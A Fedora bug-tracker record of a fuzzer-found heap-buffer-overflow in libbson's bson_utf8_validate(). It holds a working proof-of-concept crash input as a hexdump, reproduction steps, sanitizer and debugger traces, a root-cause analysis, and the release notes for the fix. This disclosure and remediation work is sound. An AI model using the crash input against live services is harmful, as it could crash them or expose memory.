Bug 1489355
Summary: | There is a heap-buffer-overflow in bson_utf8_validate() function of libbson. | ||||||||
---|---|---|---|---|---|---|---|---|---|
Product: | [Fedora] Fedora | Reporter: | owl337 <v.owl337> | ||||||
Component: | libbson | Assignee: | Petr Pisar <ppisar> | ||||||
Status: | CLOSED ERRATA | QA Contact: | Fedora Extras Quality Assurance <extras-qa> | ||||||
Severity: | unspecified | Docs Contact: | |||||||
Priority: | unspecified | ||||||||
Version: | rawhide | CC: | fedora, jesse, ppisar | ||||||
Target Milestone: | --- | ||||||||
Target Release: | --- | ||||||||
Hardware: | Unspecified | ||||||||
OS: | Unspecified | ||||||||
URL: | https://jira.mongodb.org/projects/SECURITY/issues/SECURITY-476 | ||||||||
Whiteboard: | |||||||||
Fixed In Version: | libbson-1.8.0-1.fc28 | Doc Type: | If docs needed, set a value | ||||||
Doc Text: | Story Points: | --- | |||||||
Clone Of: | Environment: | ||||||||
Last Closed: | 2018-01-04 09:14:20 UTC | Type: | Bug | ||||||
Regression: | --- | Mount Type: | --- | ||||||
Documentation: | --- | CRM: | |||||||
Verified Versions: | Category: | --- | |||||||
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |||||||
Cloudforms Team: | --- | Target Upstream Version: | |||||||
Embargoed: | |||||||||
Bug Depends On: | |||||||||
Bug Blocks: | 1494401 | ||||||||
Attachments: |
|
Thank you for your report. It looks like this issue is not specific to Fedora build and you should report your security findings directly to libbson authors <https://docs.mongodb.com/manual/tutorial/create-a-vulnerability-report/> because the root problem is there. The problem is not in bson_utf8_validate(). The problem is that somebson_iter_codewscope() computes the string length as 4294967295 passes this wrong value to bson_utf8_validate() as the second utf8_len argument. Created attachment 1323092 [details]
POC1 file input for examples/bson-metrics.c program
The reproducer runs examples/bson-metrics.c on this attached POC1 file with this content:
$ hexdump -C POC1
00000000 15 00 00 00 0f 00 0e 00 00 00 00 00 00 00 06 00 |................|
00000010 00 00 00 00 00 00 03 e8 88 88 00 00 |............|
0000001c
I can reproduce it with current upstream git code 1.7.0-rc0-24-g3dd28b6. And also with developmental 1.8.0-rc0 code. I forwarded it to <https://jira.mongodb.org/projects/SECURITY/issues/SECURITY-476>. Bugfix in progress, here's a public description: https://jira.mongodb.org/browse/CDRIVER-2269 libbson crashes while iterating over a valid (but strange) BSON input. We'll release the fix next week. *** Bug 1489356 has been marked as a duplicate of this bug. *** *** Bug 1489362 has been marked as a duplicate of this bug. *** libbson-1.8.0-1.fc27 has been submitted as an update to Fedora 27. https://bodhi.fedoraproject.org/updates/FEDORA-2017-1953158d1f All Fedoras are affected. This is not reproducible with the reporter's sample but it's reproducible with the new tests added together with the fix. I will port it back. libbson-1.6.3-2.fc26 has been submitted as an update to Fedora 26. https://bodhi.fedoraproject.org/updates/FEDORA-2017-a4cf96bcca libbson-1.3.5-4.fc25 has been submitted as an update to Fedora 25. https://bodhi.fedoraproject.org/updates/FEDORA-2017-7edc2ea787 libbson-1.8.0-1.fc27 has been pushed to the Fedora 27 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-1953158d1f libbson-1.6.3-2.fc26 has been pushed to the Fedora 26 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-a4cf96bcca libbson-1.3.5-4.fc25 has been pushed to the Fedora 25 testing repository. If problems still persist, please make note of it in this bug report. See https://fedoraproject.org/wiki/QA:Updates_Testing for instructions on how to install test updates. You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-2017-7edc2ea787 libbson-1.6.3-2.fc26 has been pushed to the Fedora 26 stable repository. If problems still persist, please make note of it in this bug report. libbson-1.3.5-4.fc25 has been pushed to the Fedora 25 stable repository. If problems still persist, please make note of it in this bug report. libbson-1.8.0-1.fc27 has been pushed to the Fedora 27 stable repository. If problems still persist, please make note of it in this bug report. |
Created attachment 1323012 [details] Triggered by " ./bson-metrics POC1" Description of problem: There is a heap-buffer-overflow in bson_utf8_validate() function of libbson. Version-Release number of selected component (if applicable): <= latest version How reproducible: ./bson-metrics POC1 Steps to Reproduce: The debugging information is as follows: $ ./bson-metrics POC1 Segmentation fault ASAN debugging information: $ ./bson-metrics POC1 ================================================================= ==61994==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000b880 at pc 0x7f1da16706b7 bp 0x7ffe5cc1a480 sp 0x7ffe5cc1a478 READ of size 1 at 0x61900000b880 thread T0 #0 0x7f1da16706b6 (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0xa96b6) #1 0x7f1da16394cb (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x724cb) #2 0x4dbe3c (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4dbe3c) #3 0x7f1da06d4abf (/lib/x86_64-linux-gnu/libc.so.6+0x20abf) #4 0x435648 (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x435648) 0x61900000b880 is located 0 bytes to the right of 1024-byte region [0x61900000b480,0x61900000b880) allocated by thread T0 here: #0 0x4bc78b (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4bc78b) #1 0x7f1da1662aff (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x9baff) Shadow bytes around the buggy address: 0x0c327fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff9700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff9710:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==61994==ABORTING GDB debugging information: (gdb) set args POC1 (gdb) r ... Breakpoint 7, bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143 143 if ((utf8_len - i) < seq_length) { (gdb) c 1007 Will ignore next 1006 crossings of breakpoint 7. Continuing. Breakpoint 7, bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143 143 if ((utf8_len - i) < seq_length) { (gdb) i b Num Type Disp Enb Address What 7 breakpoint keep y 0x00007ffff7b7e310 in bson_utf8_validate at src/bson/bson-utf8.c:143 breakpoint already hit 1008 times (gdb) n 151 c = utf8[i] & first_mask; (gdb) 156 for (j = i + 1; j < (i + seq_length); j++) { (gdb) 182 if (c > 0x0010FFFF) { (gdb) 197 switch (seq_length) { (gdb) 199 if (c <= 0x007F) { (gdb) 130 for (i = 0; i < utf8_len; i += seq_length) { (gdb) n ================================================================= ==100494==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61900000b880 at pc 0x7ffff7b7e6b7 bp 0x7fffffffd800 sp 0x7fffffffd7f8 READ of size 1 at 0x61900000b880 thread T0 #0 0x7ffff7b7e6b6 (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0xa96b6) #1 0x7ffff7b474cb (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x724cb) #2 0x4dbe3c (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4dbe3c) #3 0x7ffff6be2abf (/lib/x86_64-linux-gnu/libc.so.6+0x20abf) #4 0x435648 (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x435648) 0x61900000b880 is located 0 bytes to the right of 1024-byte region [0x61900000b480,0x61900000b880) allocated by thread T0 here: #0 0x4bc78b (/home/icy/secreal/libbson-asan/install/test/bson-metrics+0x4bc78b) #1 0x7ffff7b70aff (/home/icy/secreal/libbson-asan/install/lib/libbson-1.0.so.0+0x9baff) Shadow bytes around the buggy address: 0x0c327fff96c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff96f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff9700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff9710:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9720: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9730: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9740: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff9760: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==100494==ABORTING [Inferior 1 (process 100494) exited with code 01] (gdb) bt #0 bson_utf8_validate (utf8=0x61900000b48e "\006", utf8_len=4294967295, allow_null=<optimized out>) at src/bson/bson-utf8.c:143 #1 0x00007ffff7b474cc in bson_iter_visit_all (iter=<optimized out>, visitor=<optimized out>, data=<optimized out>) at src/bson/bson-iter.c:2069 #2 0x00000000004dbe3d in bson_metrics (data=<optimized out>, bson=<optimized out>, length=<optimized out>) at bson-metrics.c:208 #3 main (argc=<optimized out>, argv=<optimized out>) at bson-metrics.c:257 This vulnerability was triggered in function bson_utf8_validate() at line src/bson/bson-utf8.c:130: 130 for (i = 0; i < utf8_len; i += seq_length) { 131 _bson_utf8_get_sequence (&utf8[i], &seq_length, &first_mask); 132 133 /* 134 * Ensure we have a valid multi-byte sequence length. 135 */ 136 if (!seq_length) { 137 return false; 138 } 139 140 /* 141 * Ensure we have enough bytes left. 142 */ 143 if ((utf8_len - i) < seq_length) { 144 return false; 145 } 146 ... Actual results: crash Expected results: crash Additional info: Credits: This vulnerability is detected by team OWL337, with our custom fuzzer collAFL. Please contact ganshuitao and chaoz.cn if you need more info about the team, the tool or the vulnerability.